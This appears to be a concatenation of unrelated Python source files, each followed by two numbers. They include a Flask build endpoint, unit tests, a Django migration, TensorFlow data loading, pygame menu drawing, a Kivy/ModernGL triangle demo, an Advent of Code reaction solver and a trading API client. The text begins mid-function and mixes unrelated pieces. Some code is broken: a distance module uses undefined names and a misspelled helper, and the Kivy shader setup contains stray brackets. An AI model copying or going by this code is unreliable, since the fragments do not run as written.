'tests': self.serialize(test_failures, extended_serializers),
},
'testChanges': self.serialize(changed_tests, extended_serializers),
'parents': self.serialize(get_parents_last_builds(build)),
})
return self.respond(context)
def post(self, build_id):
build = Build.query.options(
joinedload('project', innerjoin=True),
joinedload('author'),
joinedload('source').joinedload('revision'),
).get(build_id)
if build is None:
return '', 404
args = self.post_parser.parse_args()
if args.priority is not None:
build.priority = BuildPriority[args.priority]
db.session.add(build)
context = self.serialize(build)
return self.respond(context, serialize=False)
| 8,328 | 2,535 |
import unittest
from Monitor import five_or_greater
class MockProject(object):
def __init__(self, message_count, keyword_counts):
self.message_count = message_count
self.keyword_counts = keyword_counts
class TestOneOrGreater(unittest.TestCase):
def test_some_above_some_below(self):
total = 1000
sample_dataset = {
"keep1" : 1000,
"keep2" : 800,
"not1" : 5,
"keep3" : 100,
"not2" : 1,
}
project = MockProject(total, sample_dataset)
self.assertEquals(five_or_greater(project), ["keep1", "keep2", "keep3",]) | 633 | 213 |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.11 on 2018-05-20 16:32
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Masternode',
fields=[
('txid', models.CharField(editable=False, max_length=64, primary_key=True, serialize=False)),
('address', models.CharField(max_length=64)),
('inserted_at', models.DateTimeField(auto_now_add=True)),
('last_seen_at', models.DateTimeField(auto_now_add=True)),
('status', models.CharField(max_length=30)),
('version', models.IntegerField()),
],
),
migrations.CreateModel(
name='MasternodeHistory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('txid', models.CharField(max_length=64)),
('inserted_at', models.DateTimeField(auto_now_add=True)),
('status', models.CharField(max_length=30)),
('version', models.IntegerField()),
],
),
]
| 1,293 | 372 |
# coding: utf8
__author__ = 'baocaixiong'
__all__ = ['TmcClient']
from tmcclient import TmcClient
| 100 | 40 |
print("test.py")
| 17 | 8 |
import numpy as np
import tensorflow as tf
from tensorflow import gfile
from PIL import Image
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import LabelBinarizer
import multiprocessing
import sys
import os
def resize(img,shape):
return tf.image.resize(img,shape)
def load_mnist():
pass
def preprocess_input(path):
with Image.open(path) as img:
img = np.array(img, np.float32)
img = img/255
img = create_dataset(np.array([img]),np.array([[0]*10],np.float32),1)
return img
def create_dataset(images, labels, batch_size):
dataset = tf.data.Dataset.from_tensor_slices((images, labels))
dataset = dataset.shuffle(len(images))
dataset = dataset.batch(batch_size)
dataset = dataset.prefetch(1)
return dataset
def load_data(train_path, batch_size=1, test_path=None):
train_images, train_labels = get_data(train_path)
if test_path:
test_images, test_labels = get_data(test_path)
else:
train_images, test_images, train_labels, test_labels = train_test_split(train_images, train_labels, shuffle=True, test_size=0.04)
val_images, test_images, val_labels, test_labels = train_test_split(test_images, test_labels, shuffle=False, test_size=0.5)
print(val_images[1].shape)
print(len(val_labels))
train = create_dataset(train_images, train_labels, batch_size)
val = create_dataset(val_images, val_labels, len(val_images))
test = create_dataset(test_images, test_labels, batch_size)
del train_images, train_labels, test_images, test_labels, val_images, val_labels
return train, val, test
def get_data(data_path):
images, labels = [], []
# classes = os.listdir(path)
# cur_dir = os.getcwd()
# os.chdir(path)
for cls in os.listdir(data_path):
path = os.path.join(data_path,cls)
for img_path in os.listdir(path):
try:
with Image.open(os.path.join(path,img_path)) as img:
images.append(np.array(img))
labels.append(cls)
except Exception as e:
pass
images = [ image/255 for image in images]
encoder = LabelBinarizer()
encoder.fit(labels)
labels = encoder.transform(labels)
labels = labels.astype(np.float32)
# os.chdir(cur_dir)
print(len(images))
print(len(labels))
return np.array(images,np.float32), np.array(labels)
def get_batch():
pass
def plot():
pass
def stack_plot():
pass
if __name__ == '__main__':
images, labels, _ = load_data("data/notMNIST_small") | 2,368 | 894 |
from __future__ import print_function, division
import sys
sys.dont_write_bytecode = True
"""
# Rows
"""
from lib import *
class Row:
n = -1
def __init__(i,t):
Row.n = i.n = Row.n + 1
i.t, i.dists = t,{}
def dist(j,k):
if j.n == k.n : return 0
if j.n > k.n : return k.dist(j)
key = (j.n, k.n)
if not key in j.dists :
j.dists[key] = dist(i.t,j,k)
return j.dists[key]
def furthest(j,lst=None,best=-1,better=gt):
lst = lst or t.rows
out = j
for k in lst:
tmp = dist(i.t,j,k)
if tmp and better(tmp,best):
out,best = k,tmp
return best
def closest(j,lst=None):
return j.furthest(lst,best=1e32,better=lt)
def knn(i,k=1,lst=None):
lst = lst or t.rows
out = {}
for r1 in lst:
for r2 in lst:
all = [(dist(i.t,r1,r2),r2) for r2 in lst]
out[r1] = sorted(all)[:k]
return out
def dist(t,j,k):
def colxy(cols,xs,ys):
for col in cols:
x = xs[col.pos]
y = ys[col.pos]
if x == "?" and y=="?": continue
yield col,x,y
def far(col,x,y):
y = col.norm(y)
x = 0 if y > 0.5 else 1
return x,y
#---------
n = all = 0
for col in colsxy(t.indep.syms,j,k):
if x== "?" or y == "?":
n += 1
all += 1
else:
inc = 0 if x == y else 1
n += 1
all += inc
for col,x,y in colxy(t.indep.nums,j,k):
if x == "?" : x,y = far(col,x,y)
elif y == "?" : y,x = far(col,y,x)
else : x,y = col.norm(x), col.norm(y)
n += 1
all += (x-y)**2
return all**0.5 / n**0.5
| 1,570 | 721 |
# -*- coding: utf-8 -*-
"""
Created on Mon Jul 9 11:17:24 2018
@author: nce3xin
"""
seed_num=1
learning_rate=1e-3
#epochs=109
#epochs=90
epochs=20
batch_size=16
log_interval=1
no_cuda=False
MODEL='LSTM'
cnn_out_dims=25
CNN_mapping=False
normalization=False
standard_scale=False
min_max_scaler=False | 306 | 161 |
"""Definition of an ElkM1 Custom Value"""
from .const import Max, TextDescriptions
from .elements import Element, Elements
from .message import add_message_handler, cp_encode, cw_encode
class Setting(Element):
"""Class representing an Custom Value"""
def __init__(self, index, elk):
super().__init__(index, elk)
self.value_format = 0
self.value = None
def set(self, value):
"""(Helper) Set custom value."""
self._elk.send(cw_encode(self._index, value, self.value_format))
class Settings(Elements):
"""Handling for multiple custom values"""
def __init__(self, elk):
super().__init__(elk, Setting, Max.SETTINGS.value)
add_message_handler('CR', self._cr_handler)
def sync(self):
"""Retrieve custom values from ElkM1"""
self.elk.send(cp_encode())
self.get_descriptions(TextDescriptions.SETTING.value)
def _cr_handler(self, index, value, value_format):
custom_value = self.elements[index]
custom_value.value_format = value_format
custom_value.value = value
| 1,091 | 337 |
from rxbp.indexed.impl.indexedflowableimpl import IndexedFlowableImpl
from rxbp.indexed.mixins.indexedflowablemixin import IndexedFlowableMixin
def init_indexed_flowable(
underlying: IndexedFlowableMixin,
):
return IndexedFlowableImpl(
underlying=underlying
)
| 286 | 93 |
"""Top-level package for COSC525-Project2."""
from .neuron import *
from .fully_connected_layer import *
from .convolutional_layer import *
from .max_pooling_layer import *
from .flatten_layer import *
from .neural_network import *
from .data_generator import *
from .tensor_files import *
| 291 | 92 |
import math
from pathlib import Path
import numpy as np
import torch
from torch import nn
import torch.nn.functional as F
from torch.autograd import Variable
from torchvision import models
from PIL import Image
from lib.default_box import dbox_params
from lib.visualize import Visualizer
from common import numpy2pil
def set_batch_norm_eval(model):
bn_count = 0
bn_training = 0
for module in model.modules():
if isinstance(module, torch.nn.modules.batchnorm.BatchNorm2d):
if module.training:
bn_training += 1
module.eval()
bn_count += 1
module.weight.requires_grad = False
module.bias.requires_grad = False
print('{} BN modules are set to eval'.format(bn_count))
class Model(nn.Module):
def __init__(self):
super().__init__()
self.num_classes = 10
self.outoput_channel = self.num_classes + 7
resnet34 = models.resnet34(pretrained=True)
self.resnet34_main = nn.Sequential(
resnet34.conv1,
resnet34.bn1,
resnet34.relu,
resnet34.maxpool,
resnet34.layer1,
resnet34.layer2,
resnet34.layer3
)
self.conv_ex1 = resnet34.layer4
self.conv_ex2 = nn.Sequential(
nn.Conv2d(512, 256, kernel_size=1, padding=0, stride=1),
nn.BatchNorm2d(256),
nn.ReLU(inplace=True),
nn.Conv2d(256, 512, kernel_size=3, padding=1, stride=2),
nn.BatchNorm2d(512),
nn.ReLU(inplace=True)
)
self.conv_up2 = nn.Sequential(
nn.ConvTranspose2d(512, 256, kernel_size=3, padding=1, stride=1),
nn.BatchNorm2d(256),
nn.ReLU(inplace=True),
nn.ConvTranspose2d(256, 512, kernel_size=2, padding=0, stride=2),
nn.BatchNorm2d(512),
nn.ReLU(inplace=True)
)
# self.conv_ex3 = nn.Sequential(nn.Conv2d(512, 128, kernel_size=1, padding=0, stride=1),
# nn.ReLU(inplace=True),
# nn.Conv2d(128, 256, kernel_size=3, padding=1, stride=2),
# nn.ReLU(inplace=True)
# )
# self.ex0_intermediate = nn.Conv2d(256, 4 * self.outoput_channel, kernel_size=3, padding=1, stride=1)
self.ex1_intermediate = nn.Sequential(
nn.Conv2d(1024, 512, kernel_size=3, padding=1, stride=1),
nn.Softplus(),
nn.Conv2d(512, 4 * self.outoput_channel, kernel_size=1, padding=0, stride=1)
)
# self.ex2_intermediate = nn.Conv2d(512, 4 * self.outoput_channel, kernel_size=3, padding=1, stride=1)
# self.ex3_intermediate = nn.Conv2d(256, 32, kernel_size=3, padding=1, stride=1)
@staticmethod
def header(h, img_size):
batch_size = len(h)
step = img_size / h.shape[-1]
points = np.arange(step / 2 - 0.5, img_size, step, dtype=np.float32)
assignment, x, y, length, width, z, height, rotate = torch.split(
h, [10, 1, 1, 1, 1, 1, 1, 1], dim=2)
x_points = np.tile(points.reshape(1, 1, 1, h.shape[-1], 1), (batch_size, len(dbox_params), 1, 1, h.shape[-1]))
y_points = np.tile(points.reshape(1, 1, 1, 1, h.shape[-1]), (batch_size, len(dbox_params), 1, h.shape[-1], 1))
rotate_vars = dbox_params['rotate_vars'].values
rotate_vars = np.tile(rotate_vars.reshape(1, len(rotate_vars), 1, 1, 1),
(batch_size, 1, 1, h.shape[-1], h.shape[-1]))
length_shifts = dbox_params['length_shifts'].values
length_shifts = np.tile(length_shifts.reshape(1, len(length_shifts), 1, 1, 1),
(batch_size, 1, 1, h.shape[-1], h.shape[-1]))
width_shifts = dbox_params['width_shifts'].values
width_shifts = np.tile(width_shifts.reshape(1, len(width_shifts), 1, 1, 1),
(batch_size, 1, 1, h.shape[-1], h.shape[-1]))
height_shifts = dbox_params['height_shifts'].values
height_shifts = np.tile(height_shifts.reshape(1, len(height_shifts), 1, 1, 1),
(batch_size, 1, 1, h.shape[-1], h.shape[-1]))
assignment = torch.softmax(assignment, dim=2) # [batch_size, dbox, channel, x, y]
x_abs = torch.tanh(x) * step + torch.from_numpy(x_points).cuda()
y_abs = torch.tanh(y) * step + torch.from_numpy(y_points).cuda()
z_abs = z + 1010.0
length_abs = torch.exp(length * 0.1 + math.log2(step) / 1.5) * torch.from_numpy(length_shifts).cuda() + 1
width_abs = torch.exp(width * 0.1 + math.log2(step) / 1.5) * torch.from_numpy(width_shifts).cuda() + 1
height_abs = torch.exp(height * 0.1 + math.log2(step) / 1.5) * torch.from_numpy(height_shifts).cuda() + 1
rotate_abs = torch.atan(rotate) + torch.from_numpy(rotate_vars).cuda()
return torch.cat([assignment, x_abs, y_abs, length_abs, width_abs, z_abs, height_abs, rotate_abs], dim=2)
def forward_main(self, x):
list_output = list()
main_out = self.resnet34_main.forward(x)
ex1_down = F.relu(self.conv_ex1(main_out))
ex2_down = self.conv_ex2(ex1_down)
ex1_up = self.conv_up2(ex2_down)
ex1_out = torch.cat([ex1_down, ex1_up], 1)
ex1_branch = self.ex1_intermediate(ex1_out) # 24x24
list_output.append(ex1_branch)
return list_output
def forward(self, x):
list_output = list()
list_main = self.forward_main(x)
for out in list_main:
size = out.shape[-1]
h = self.header(out.reshape(-1, 4, self.outoput_channel, size, size), img_size=x.shape[-1])
list_output.append(h.reshape(-1, 4 * self.outoput_channel, size, size))
return list_output
def build_model():
model = Model()
model.cuda()
return model
if __name__ == '__main__':
dir_debug = Path('_debug')
dir_debug.mkdir(exist_ok=True)
model = build_model()
print(model)
viz = Visualizer('colors.json')
# 768 x 768
in_arr1 = np.zeros((2, 3, 768, 768), dtype=np.float32)
in_tensor1 = torch.from_numpy(in_arr1)
out_vars1 = model.forward(in_tensor1.cuda())
[print(out_var.shape) for out_var in out_vars1]
out_var_numpy1 = [tensor.cpu().data.numpy() for tensor in out_vars1]
out_var_numpy_batch1 = [[tensor[b, :, :, :] for tensor in out_var_numpy1] for b in range(2)]
img = viz.draw_predicted_boxes(out_var_numpy_batch1[0], dbox_params, img_size=in_arr1.shape[-1])
numpy2pil(img).save(dir_debug / 'sample_1-0.png')
img = viz.draw_predicted_boxes(out_var_numpy_batch1[1], dbox_params, img_size=in_arr1.shape[-1])
numpy2pil(img).save(dir_debug / 'sample_1-1.png')
# 1024 x 1024
in_arr2 = np.zeros((2, 3, 1024, 1024), dtype=np.float32)
in_tensor2 = torch.from_numpy(in_arr2)
out_vars2 = model.forward(in_tensor2.cuda())
[print(out_var.shape) for out_var in out_vars2]
out_var_numpy2 = [tensor.cpu().data.numpy() for tensor in out_vars2]
out_var_numpy_batch2 = [[tensor[b, :, :, :] for tensor in out_var_numpy2] for b in range(2)]
img = viz.draw_predicted_boxes(out_var_numpy_batch2[0], dbox_params, img_size=in_arr2.shape[-1])
numpy2pil(img).save(dir_debug / 'sample_2-0.png')
img = viz.draw_predicted_boxes(out_var_numpy_batch2[1], dbox_params, img_size=in_arr2.shape[-1])
numpy2pil(img).save(dir_debug / 'sample_2-1.png')
| 7,581 | 3,028 |
import numpy as np
import pytest, os
from numpy.testing import assert_array_equal
from ReconstructOrder.datastructures.physical_data import PhysicalData
def test_basic_constructor_nparray():
"""
test assignment using numpy arrays
"""
phys = PhysicalData()
phys.I_trans = np.ones((512, 512))
phys.polarization = 2 * np.ones((512, 512))
phys.retard = 3 * np.ones((512, 512))
phys.depolarization = 4 * np.ones((512, 512))
phys.azimuth = 5 * np.ones((512, 512))
phys.azimuth_degree = 6 * np.ones((512, 512))
phys.azimuth_vector = 7 * np.ones((512, 512))
assert_array_equal(phys.I_trans, np.ones((512, 512)))
assert_array_equal(phys.polarization, 2*np.ones((512, 512)))
assert_array_equal(phys.retard, 3*np.ones((512, 512)))
assert_array_equal(phys.depolarization, 4*np.ones((512, 512)))
assert_array_equal(phys.azimuth, 5*np.ones((512, 512)))
assert_array_equal(phys.azimuth_degree, 6*np.ones((512, 512)))
assert_array_equal(phys.azimuth_vector, 7*np.ones((512, 512)))
def test_basic_constructor_memap(setup_temp_data):
"""
test assignment using memory mapped files
"""
mm = setup_temp_data
phys = PhysicalData()
phys.I_trans = mm
phys.polarization = 2 * mm
phys.retard = 3 * mm
phys.depolarization = 4 * mm
phys.azimuth = 5 * mm
phys.azimuth_degree = 6 * mm
phys.azimuth_vector = 7 * mm
assert_array_equal(phys.I_trans, mm)
assert_array_equal(phys.polarization, 2*mm)
assert_array_equal(phys.retard, 3*mm)
assert_array_equal(phys.depolarization, 4*mm)
assert_array_equal(phys.azimuth, 5*mm)
assert_array_equal(phys.azimuth_degree, 6*mm)
assert_array_equal(phys.azimuth_vector, 7*mm)
def test_instances():
"""
test instance attributes
"""
phs1 = PhysicalData()
phs2 = PhysicalData()
with pytest.raises(AssertionError):
assert(phs1 == phs2)
with pytest.raises(AssertionError):
phs1.retard = 1
phs2.retard = 2
assert(phs1.retard == phs2.retard)
def test_private_access(setup_physical_data):
"""
test that private attributes are not accessible
"""
phys = setup_physical_data
with pytest.raises(AttributeError):
print(phys.__I_trans)
print(phys.__retard)
# ==== Attribute assignment ==========
def test_assignment(setup_physical_data):
"""
test exception handling of improper assignment
"""
phys = setup_physical_data
with pytest.raises(TypeError):
phys.incorrect_attribute = 1 | 2,560 | 997 |
#!/bin/python
"""Day 14: Space Stoichiometry.
Handle chemical reactions, converting ORE to FUEL.
"""
import collections
import math
import typer
from typing import Dict, List, Set, Tuple
import data
from lib import aoc
SAMPLE = data.D14
TRILLION = int(1e12)
class Reaction:
"""Wrapper around a single reaction."""
def __init__(self, product: Tuple[int, str], reactants: List[Tuple[int, str]]):
self._reactants = reactants
self.product_amt, self.product = product
self.reactants = {r[1] for r in self._reactants}
def needed(self, count: int) -> Tuple[List[Tuple[int, str]], int]:
"""Calculate much of of each reactant is needed to make `count` product.
Returns the reactants needed and the amount of product produced.
"""
factor = math.ceil(count / self.product_amt)
return [(factor * c, e) for c, e in self._reactants], factor * self.product_amt
class Day14(aoc.Challenge):
TESTS = (
aoc.TestCase(inputs=SAMPLE[0], part=1, want=165),
aoc.TestCase(inputs=SAMPLE[1], part=1, want=13312),
aoc.TestCase(inputs=SAMPLE[2], part=1, want=180697),
aoc.TestCase(inputs=SAMPLE[3], part=1, want=2210736),
aoc.TestCase(inputs=SAMPLE[1], part=2, want=82892753),
aoc.TestCase(inputs=SAMPLE[2], part=2, want=5586022),
aoc.TestCase(inputs=SAMPLE[3], part=2, want=460664),
)
def part1(self, reactions: Dict[str, Reaction]) -> int:
"""Calculate how much ore is needed for 1 unit of fuel."""
return self.ore_per_fuel(reactions, 1)
def part2(self, reactions: Dict[str, Reaction]) -> int:
"""Determine how much fuel can be made with 1e12 ore.
Use the `ore_per_fuel()` function to binary search from 0 to 2e12 / ore_per_fuel(1).
"""
low, high = 1, 2 * TRILLION // self.ore_per_fuel(reactions, 1)
while (high - low) > 1:
mid = (low + high) // 2
ore = self.ore_per_fuel(reactions, mid)
if ore == TRILLION:
# Unlikely to occur but it doesn't hurt to be safe.
return mid
elif ore > TRILLION:
high = mid
else:
low = mid
return low
def part2_via_reactions(self, reactions: Dict[str, Reaction]) -> int:
"""Solve part2 by actually running reactions until we run out of ore."""
# Track inventory of products as we run reactions and have leftovers.
inventory = {product: 0 for product in reactions}
inventory['ORE'] = TRILLION
def react(product: str, amount: int, inv: Dict[str, int]) -> bool:
"""Run a reaction to produce `amount` of `product` using mutatable inventory `inv`.
Returns a bool indicating if we can actually pull off the reaction. On False, `inv`
is a bit trashed.
"""
def _react(product, amount):
"""Closure on `inv` to avoid passing it around."""
# If we do not have enough ore and are trying to produce some, this reaction fails.
if product == 'ORE':
return False
needs, gets = reactions[product].needed(amount)
# Produce all the needed reactants to run the reaction.
# Some reactants might use up others to be formed, hence the loop.
while any(inv[reactant] < uses for uses, reactant in needs):
for uses, reactant in needs:
if inv[reactant] >= uses:
continue
# We need more of this reactant. Try to produce it. Mutates `inv`.
short = uses - inv[reactant]
if not _react(reactant, short):
return False
# Mutate `inv` and run the reaction. Use up reactants, produce product.
for uses, reactant in needs:
inv[reactant] -= uses
inv[product] += gets
return True
return _react(product, amount)
# Try to produce fuel in large quantities at first.
# Reduce reaction size as they fail.
volume = TRILLION // self.part1(reactions)
while True:
# Since failed reactions mutate the inventory, first see if they will work
# on a copy. Then actually update the inventory.
if react('FUEL', volume, inventory.copy()):
react('FUEL', volume, inventory)
else:
# Failed to produce 1 fuel. We are at the end.
if volume == 1:
return inventory['FUEL']
volume = volume // 2 or 1
def ore_per_fuel(self, reactions: Dict[str, Reaction], fuel: int) -> int:
"""Calculate how much ore is required to produce `fuel` units of fuel."""
_dependencies = {'ORE': set()} # type: Dict[str, Set[str]]
def dependencies(product: str) -> Set[str]:
"""Compute *all* reactants (recursively) involved in producing `product`."""
# Cache results for dynamic programming.
if product not in _dependencies:
# Collect all reactants ... recursively.
deps = set(reactions[product].reactants)
for reactant in list(deps):
deps.update(dependencies(reactant))
_dependencies[product] = deps
return _dependencies[product]
# Iteratively resolve all products to the reactants needed to produce them.
# Stop when we get down to just ore.
want = collections.defaultdict(int)
want['FUEL'] = fuel
while list(want.keys()) != ['ORE']:
# Find all products which are not also reactants of other products.
# If a product is also a reactant, we may need more of it so it cannot yet be solved.
products = {r for r in want.keys() if not any(r in dependencies(other) for other in want)}
for product in products:
# Add all the required reactants to the want list and remove the product.
for amount, reactant in reactions[product].needed(want[product])[0]:
want[reactant] += amount
del want[product]
return want['ORE']
def parse_input(self, puzzle_input: str) -> Dict[str, Reaction]:
"""Build a dictionary of material produced to Reaction."""
reactions = {} # type: Dict[str, Reaction]
def to_tuple(pair: str) -> Tuple[int, str]:
a, b = pair.split()
return (int(a), b)
for line in puzzle_input.split('\n'):
reactants, product = line.split('=>')
reaction = Reaction(
to_tuple(product),
[to_tuple(p) for p in reactants.split(', ')],
)
reactions[reaction.product] = reaction
return reactions
if __name__ == '__main__':
typer.run(Day14().run)
# vim:ts=2:sw=2:expandtab
| 6,349 | 2,041 |
#!/usr/bin/env python
import sys
from pynauty import autgrp, Version
import pytest
# List of graphs for testing
#
# Structure:
# [[name, Graph, numorbit, grpsize, generators]]
#
# numorbit, grpsize, generators was calculated by dreadnut
#
def test_autgrp(graph):
gname, g, numorbit, grpsize, gens = graph
print(Version())
print('%-17s ...' % gname, end=' ')
sys.stdout.flush()
generators, order, o2, orbits, orbit_no = autgrp(g)
assert generators == gens and orbit_no == numorbit and order == grpsize
| 530 | 189 |
import abc
import requests
import time
import json
from easytrader.utils.misc import file2dict
class IRemoteTrader(abc.ABC):
@abc.abstractmethod
def prepare(
self,
config_path=None,
user=None,
password=None,
token=None,
address=None,
):
pass
@property
@abc.abstractmethod
def balance(self):
pass
@property
@abc.abstractmethod
def position(self):
pass
@property
@abc.abstractmethod
def today_trades(self):
pass
@property
@abc.abstractmethod
def today_entrusts(self):
pass
@abc.abstractmethod
def buy(self, stock_id, price: float, amount: int):
pass
@abc.abstractmethod
def sell(self, stock_id, price: float, amount: int):
pass
@abc.abstractmethod
def cancel_entrust(self, entrust_no: str):
pass
class PAZQRemoteTrader(IRemoteTrader):
def _api_get(self, func_name: str):
try:
return requests.get(
self.address + func_name,
timeout=self.timeout,
headers={'trader-token': self.token}
).json()
except Exception as e:
print(e)
return {'status': 'fail', 'msg': 'Network error.'}
def _api_post(self, func_name: str, params: dict):
try:
return requests.post(
self.address + func_name,
timeout=self.timeout,
headers={'trader-token': self.token},
params=params
).json()
except Exception as e:
return {'status': 'fail', 'msg': 'Network error.', 'info': e}
def prepare(
self,
config_path=None,
user=None,
password=None,
token=None,
address=None,
timeout=5,
):
if config_path is not None:
account = file2dict(config_path)
token = account['token']
#user = account['user']
#password = account['password']
address = account['address']
timeout = account['timeout']
self.token = token
self.user = user
self.password = password
self.address = address
self.timeout = timeout
return self._api_get('prepare')
@property
def balance(self):
return self._api_get("balance")
@property
def position(self):
return self._api_get("position")
@property
def today_trades(self):
return self._api_get("today_trades")
@property
def today_entrusts(self):
return self._api_get("today_entrusts")
def buy(self, stock_id, price: float, amount: int):
return self._api_post("buy", {'stock_id': stock_id, 'price': price, 'amount': amount})
def sell(self, stock_id, price: float, amount: int):
return self._api_post("sell", {'stock_id': stock_id, 'price': price, 'amount': amount})
def cancel_entrust(self, entrust_no: str):
data = self._api_post("cancel_entrust", {'entrust_no': entrust_no})
if data['status'] == 'success' and 'success' not in data['data']['message']:
data['status'] = 'fail'
return data
| 3,284 | 942 |
import pygame, constants, copy
# pygame.init()
pygame.display.set_mode(constants.default_size)
current_path = constants.current_path + "Pixel Images\\"
def load_img(path, colorkey=(255,255,255)):
img = pygame.image.load(current_path + path).convert()
img.set_colorkey(colorkey)
return img
def create_path(path:str):
"""
:param path:path is the relative path from the pixel images folder
:return: the relative path from roots of project
"""
return current_path + path
def darken_except(pic, pos):
dark_picture = obscure(pic, (0,0,0), 200)
pygame.draw.circle(dark_picture, (255, 255, 255), pos, 20)
dark_picture.set_colorkey((255,255,255))
pic.blit(dark_picture, (0, 0))
pass
def switch_base():
global menu_base
if menu_base == menu_base_dark:
menu_base = menu_base_clear
else:
menu_base = menu_base_dark
def obscure(pic, color, alpha):
overlay = pygame.Surface(pic.get_size())
overlay.fill(color)
overlay.set_alpha(alpha)
return overlay
# intro
small_bolt = load_img("small_bolt.png", (0, 0, 0))
medium_bolt = load_img("medium_bolt.png", (0, 0, 0))
large_bolt = load_img("large_bolt.png", (0, 0, 0))
clearCloud = pygame.image.load(create_path("Clear Clouds.png"))
stormCloud = pygame.image.load(create_path("Storm Clouds.png"))
mountain_range_height = 200
menu_base = pygame.transform.scale(load_img("main_menu.png"), constants.size)
mountain_1 = load_img("Title Screen Mountain.png", (0, 0, 0))
mountain_2 = load_img("Title Screen Mountain 2.png", (0, 0, 0))
mountain_3 = load_img("Title Screen Mountain 3.png", (0, 0, 0))
pygame.draw.rect(menu_base, (139, 195, 74), pygame.Rect((0,mountain_range_height + mountain_1.get_height() - 20), menu_base.get_size()))
menu_base.blit(mountain_1, (-20, mountain_range_height))
menu_base.blit(mountain_2, (200, mountain_range_height))
menu_base.blit(mountain_3, (120, mountain_range_height))
menu_base_clear = copy.copy(menu_base)
menu_base = menu_base_clear
menu_base_clear.blit(pygame.transform.scale(clearCloud, (60,20)), (15,20))
menu_base_clear.blit(pygame.transform.scale(clearCloud, (70,30)), (70,40))
menu_base_clear.blit(clearCloud, (120,0))
menu_base_clear.blit(pygame.transform.scale(clearCloud, (79,30)), (250,30))
menu_base_clear.blit(clearCloud, (275,0))
menu_base_dark = copy.copy(menu_base)
dark_picture = obscure(menu_base_dark, (0,0,0), 200)
# drawing on all the lightnings
menu_base_dark.blit(dark_picture, (0, 0))
menu_base_dark.blit(pygame.transform.scale(stormCloud, (60,20)), (15,20))
menu_base_dark.blit(pygame.transform.scale(stormCloud, (70,30)), (70,40))
menu_base_dark.blit(stormCloud, (120,0))
menu_base_dark.blit(pygame.transform.scale(stormCloud, (79,30)), (250,30))
menu_base_dark.blit(stormCloud, (275,0))
menu_base_dark.blit(small_bolt, (40, 40))
menu_base_dark.blit(small_bolt, (200, 50))
menu_base_dark.blit(medium_bolt, (100, 70))
menu_base_dark.blit(medium_bolt, (350, 10))
menu_base_dark.blit(medium_bolt, (150, 20))
menu_base_dark.blit(medium_bolt, (300, 60))
# map and notifs
demo_map = pygame.image.load(create_path("Demo Map.png")).convert()
demo_map = pygame.transform.scale(demo_map,(360,360))
demo_mask = demo_map.copy()
demo_mask.fill((0, 0, 0))
simple_map = pygame.image.load(create_path("Simple Map.png")).convert() # 150 by 150
lava = pygame.image.load(create_path("Lava.png"))
poison = pygame.image.load(create_path("Poison Lake.png"))
cactus = pygame.image.load(create_path("Cactus1.png"))
| 3,496 | 1,454 |
import struct
import ModernGL
from kivy.app import App
from kivy.core.window import Window
from kivy.graphics import Callback
from kivy.uix.widget import Widget
class CustomWidget(Widget):
def __init__(self, **kwargs):
super(CustomWidget, self).__init__(**kwargs)
with self.canvas:
self.ctx = ModernGL.create_context()
self.prog = self.ctx.program(
vertex_shader='''
#version 330
uniform vec2 WindowSize;
in vec2 in_vert;
in vec3 in_color;
out vec3 v_color;
void main() {
v_color = in_color;
gl_Position = vec4(in_vert / WindowSize * 2.0, 0.0, 1.0);
}
'''),
fragment_shader='''
#version 330
in vec3 v_color;
out vec4 f_color;
void main() {
f_color = vec4(v_color, 1.0);
}
'''),
])
self.window_size = self.prog.uniforms['WindowSize']
self.vbo = self.ctx.buffer(struct.pack(
'15f',
0.0, 100.0, 1.0, 0.0, 0.0,
-86.0, -50.0, 0.0, 1.0, 0.0,
86.0, -50.0, 0.0, 0.0, 1.0,
))
self.vao = self.ctx.simple_vertex_array(self.prog, self.vbo, ['in_vert', 'in_color'])
Callback(self.draw)
def draw(self, *args):
self.width, self.height = Window.size
self.ctx.viewport = (0, 0, self.width, self.height)
self.ctx.clear(0.9, 0.9, 0.9)
self.ctx.enable(ModernGL.BLEND)
self.window_size.value = (self.width, self.height)
self.vao.render()
def ask_update(self, *args):
self.canvas.ask_update()
class MainApp(App):
def build(self):
return CustomWidget()
if __name__ == '__main__':
MainApp().run()
| 2,030 | 672 |
import inspect
from abc import ABCMeta, abstractmethod
from typing import Any, Generic, List, Mapping, Optional, Type, TypeVar
from .error import NotARecordClass
T = TypeVar("T")
FieldType = TypeVar("FieldType")
class DatargsParams:
def __init__(self, parser: Optional[Mapping[str, Any]] = None):
self.parser = parser or {}
class RecordField(Generic[FieldType, T], metaclass=ABCMeta):
"""
Abstract base class for fields of dataclasses or attrs classes.
"""
field: FieldType
def __init__(self, field):
self.field = field
@abstractmethod
def is_required(self) -> bool:
"""
Return whether field is required.
"""
pass
@property
@abstractmethod
def default(self) -> T:
pass
@property
@abstractmethod
def converter(self):
pass
@property
@abstractmethod
def name(self) -> str:
pass
@property
@abstractmethod
def type(self) -> Type[T]:
pass
@property
@abstractmethod
def metadata(self) -> Mapping[str, Any]:
pass
def has_default(self) -> bool:
"""
Helper method to indicate whether a field has a default value.
Used to make intention clearer in call sites.
"""
return not self.is_required()
class RecordClass(Generic[FieldType], metaclass=ABCMeta):
"""
Abstract base class for dataclasses or attrs classes.
"""
# The name of the attribute that holds field definitions
fields_attribute: str = "__invalid__"
# The type to wrap fields with
field_wrapper_type: Type[RecordField]
_implementors: List[Type["RecordClass"]] = []
def __init_subclass__(cls, **kwargs) -> None:
super().__init_subclass__()
if not inspect.isabstract(cls):
cls._implementors.append(cls)
def __init__(self, cls) -> None:
self.cls: type = cls
@property
def datargs_params(self) -> DatargsParams:
return getattr(self.cls, "__datargs_params__", DatargsParams())
@property
def parser_params(self) -> Mapping[str, Any]:
return self.datargs_params.parser
@property
def name(self) -> str:
return self.cls.__name__
@abstractmethod
def fields_dict(self) -> Mapping[str, RecordField]:
"""
Returns a mapping of field names to field wrapper classes.
"""
pass
@classmethod
def can_wrap_class(cls, potential_record_class) -> bool:
"""
Returns whether this class is the appropriate implementation for wrapping `potential_record_class`.
"""
return getattr(potential_record_class, cls.fields_attribute, None) is not None
@classmethod
def wrap_class(cls, record_class) -> "RecordClass":
"""
Wrap `record_class` with the appropriate wrapper.
"""
for candidate in cls._implementors:
if candidate.can_wrap_class(record_class):
return candidate(record_class)
